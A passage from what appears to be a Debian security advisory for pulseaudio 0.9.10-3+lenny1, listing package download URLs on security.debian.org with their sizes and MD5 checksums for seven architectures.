062e6b1afa28866b228fc87155943732\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 208414 e084a3d799635456d4dbacdca86bd1b7\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 182370 c1e14b5fd691c1641415338cf1e79447\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 78974 d0129cf797a2776b114e3fe1edb27481\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_hppa.deb\n Size/MD5 checksum: 100854 7262936a66cbfbf28238d9a8aac94df5\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 626258 ad53927f9191a30ece14d384771d91eb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 64802 5d1e2592b74d0aa62e8632bc1d7332dd\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 329958 cf1dc1d53d63aff332f77000f9689809\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 87944 8b09c160eba8056accc7ac6a76f4b99e\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 66768 d5d2287c15c58ea6711780f292bc33ef\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 98506 f78a97401b61a2509e4cd1706a0184f1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 78480 c3b249616f8c006be82934af31a0ae3b\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 74446 1c6806ac6a22f536f6c7cea114a0df0d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 97200 86660a9b90cd20673b93e29bf29cb276\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 64646 ed1ff8ed495d3b8b3a22bf7afc065da8\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 345030 64a42b2d34effc11b1e8a61620a7a521\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 61126 3b04087a15e8a03584b59037cd6afa1b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 68672 c62121286746886bcf0a71602e4cb752\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 77926 2738194ead6bc01c6218f06a12788ffc\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 172832 42b925c62b31a7ce70e20a625b79dff7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 96862 3c3bdd4e5b1e7e71943bc5a10b3ca556\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 235472 d4807cb2d24fe5c75dc1d383c873853d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 68622 9f569fcb383085837dce53178f475606\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 67704 f23f1863dc92465ab4471a3c14353e5f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 274188 4a63ab9fec354c4e55fe3e3dcb625abd\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 58134 d87db4e90eb34048d1e3a56f23ec11b0\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 327124 6079db2f5393568dccb101b6547e8114\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 92946 216b3faa0e4581d0fd5f0da23c732201\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 187624 a7469faed014c27e22c9e7ddd51839b4\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 75210 0964804e5e0e70a407f141ac94733d68\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 74640 bf161ee39ae869868db5302b7a83c4a5\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_i386.deb\n Size/MD5 checksum: 395536 cd71bad939472134716b5a9d9e325242\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 64550 fa163fdf969411758028900ca1bbcb09\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 72450 3b6a9f32d9d244935b7491573a5b938f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 74902 1b76741165db8949eff8fd209cc50a2e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 247624 12183ccf151d84e69aed0232134b1cfd\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 634794 f150604332530b14c12a2c6fed8dd811\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 487892 202ea396c26028b0a80f6b114652ef02\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 236928 66145897cb2594f7922a858e865b34c3\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 476576 d1fa8daa880ad0d961cca194ffd1f03a\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 83924 84618cf2effb7106dc0dab0535f4543e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 309532 f24a84b7d79bde93b8f4f3f71d4a4122\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 93012 69fdb275fbef3c08ea27435acd614247\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 267248 51b3045e082e78268f2529891d424601\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 68670 a8cf46bb4c9bf56537d55a1a9ceecb54\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 83410 b890db2bc15ceeafd14a377577d31d35\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 68134 d74e54a886deca2c4359ade661cdb42a\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 380682 c43351c007f56ab3d77a1f977f659c5a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 63556 b374042d43bb6f8fc4efc27b36f9969e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 96502 04ab1de243a7d36b9895e2876b85a8ac\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 100782 6480a01d3e6a8a2c120a03b921cadff7\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 80850 fa575119328c04d1b54df674ee47ba96\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 59646 ae7539cea6d769bbaf67ce25f03a9a9d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 87716 a23aef27fa273004dd6bf72d3000d044\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 79454 95d7c438ff59b44947b33f2e29b049bf\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 71730 94e926c5578c38a3e59e95260fd05f1a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 89394 5c0eb0d18a58698c826cb6f34cc79819\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 312634 49811d5af820d0c01589704a06a43f70\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_ia64.deb\n Size/MD5 checksum: 94250 99e1822381d12f8a1e272a53229bda2f\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 67700 2fb2a3264f7467fbf11137b1727ceecf\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 347702 12f059b554dd98730756034e5b7dafb6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 63996 9ba7f7247959d3e48149f749b747874e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 74308 5df3a35d2ec9a16c54d35f4a319bd465\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 60638 cd57423232f7c86c4b722e9e3d0e2889\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 63862 c7e66b3abe793ab644d131a1fc42e5c0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 102752 64803fee04739b5dbeac2fc99e7d2b59\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 405048 5ffcc0b6ba1de9e4c69fa41b778c2cbb\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 65328 efd43b1079210526857e64f51c878c2c\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 225428 98a5f6c1f56cb93bcfee9cf16347160c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 67662 e0813f6cf0cd64c6f2829c1a108f16b8\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 416174 88f43dab9cee294d33f0578ac6f099d2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 172062 dab30e756c76604d0a74f889e4c10b01\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 57730 dfc7881de991c407a62e79a564dab14c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 75466 dd9d908fdcc7d5acbf7bf7465df774e3\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 79020 ac9fc592cc2257e06756052f9ce14c0d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 276606 f472a9954d213e8184287038c9ab319a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 66904 92f526018fe9f96672a74ab7f6cbdb78\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 100898 a6a2f7d6c39fb93349645277235154be\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 650818 816ba8a2498939eec70f3f9175f5fe6d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 93010 1f6f98f7f5d262f1e9f151cea20ad6fd\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 73848 6640b99b6da5351f0c36fa048c1b339b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 87808 7733283cddcd38ad69383298d12b7af7\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 334254 c35970a8bca34c74557ca97b9fbea976\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 178734 48c3e2141cb85fc630f098c9aa0b31e5\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 98690 7539ef5197b170adc2c0f4f3095dac39\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 78674 6f0f69a9a5a34345f1250210180d6477\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 377926 0b4d6084d5c7d6a8f4d2a606a80e90d9\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 65362 dc52cb4b9ecbf55cd4b048e09edeaa36\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 203634 d46252e0277a17e23ed1c374e7d0b40e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 101244 4704ccf4dae60837fa5cd056b19cd915\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 70098 9fb0261e0c0e0056aa88bc7fd0b481b4\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 77306 1dc0b5b94030b7a688bda80eaf133c72\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 65732 3669846ce9a835c61658623028a212da\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 403870 973aa32fa72e821b23fffe46084b5d4a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 686228 bbf54598d5b8f07ba19a3ebb7e87325f\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 251140 47533654191322fac29641b0d19b8698\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 194882 460f8cf77083e917a3096fa65c8552a7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 339512 47cb0c635f75c5420ebf2e9e803f8b4d\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 98870 a485175a5086242ac0adfb7997d4740d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 87304 8c82e2255583ef17b506d36096611f8f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 92304 32d2a875ac15bbeb006a965b459f4cf1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 60610 3e025417fd8fcfd9ec9acfc8cdff1ac9\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 77312 8fbbaa0f91f6a2780cd9216084608d59\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 82426 038251aa3bf89f11303c5c123a4cf726\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 70378 ea5725f405ee39e985a61865a27854de\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 283046 14cc07f105861c25b5bf221c86b62d91\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 75070 8fdd7192b94ed7e299cecc9b0f92e1ed\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 102824 b977fb28f919d9911d940a74002ba28a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 98982 385739f4ca999e125bb42d1dac974a72\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 82984 ed99d756b799ba6b07e5276658cc78b0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 68070 dfbe4aea1b2e9408a5f295ff8f4b6a3a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 73856 56d0b369ea00d29bdfd9bb83c0257f9d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 439454 b31c7cafbfcd4c83dddd48785a7754e9\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 100548 0214fc442482b5c7090ceb79f5c27090\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 78522 8261d3e83421e938dc6890010a9d70e0\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 208544 14fecf1a7fcc580afbdeab1f8b73f324\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 99258 65d1c2cd1f3b0428ea380c50d1bd21ce\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 87860 0a6f5a602dbcf5b0a9aa08276bfde951\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 61986 4dcaf2c6e2ccffa2759e83320f32d835\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 371424 da91f945dea21175c7fef71027ce2da3\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 341270 2e06708dc7a2613538e8d9b77b6fc4f6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 79084 cbd78997b63ef376ee06e0178d73bc8e\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 190560 caf484ec5151295273f93fcee9b3a4b1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 67958 cf6178674b57b0401c2cfb5ae72f09ab\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 620812 2d6ce88c0adf540f176a3d5245399b9b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 65930 7dd7becdeae80cf1026b7a493384f90f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 67810 f995fc059e29a3570e10c2c13b4b0bc9\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 415728 a3581bc853eeb0e0b61fb27a20012045\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 70058 72b7126c044b80e87c66eb8a7ea416bc\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 58546 9f267ca42e705a4c67794170141d04f7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 265622 91881d612e8901e35b3eaec011f33b96\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 75462 c97b5ed23b8f780b48a8bc98abe5b1f6\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 343574 a1cd00f9270d94b950919db89a30a62c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 273492 79a540bbca1d60f49499c9544206ace6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 68904 e5eb7d9ab4a2ec85a1122132c3c100aa\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 81674 c7163db17dd230855cf1a46383f34264\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 64466 934307a2947170203947227b354ad18b\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 98328 758922dfd82920ca20186820e19ae512\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 78962 f9ec3beb93a7068118530ed33272d174\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 91544 6673126a6365b553ce05c8eb6b16e745\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 66662 45d9e412cf170071c64289e1a92a6b09\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 63560 8ea5f8d300fad52cf57bc093bc938a8a\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 242524 0c84b827fc920dc16f130f0015145708\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 75078 db616b6a59b36438bcd5afc7347f1e96\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 75304 3f020ccb8aea47c0a27e955b5d86a900\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 74232 b19af2e3e228167a6f2f1cce443ee59a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 93702 46d917e58daacc5260b911be29d55c46\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 353434 c7ee1906b4ca8d317b3c7188b7e93458\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 65790 bb598f0efa599c5f41c2b4e48882052a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 86014 d8ed73c0885f744fdbb5b8204ee5a088\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 77468 c129ad3556417f4d80d6628b62ab904f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 57622 ff9552b5a136ba5ecb50e2e438a0acd0\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 97486 7ef20c0cbad0de3f971839f5f3cc0399\n 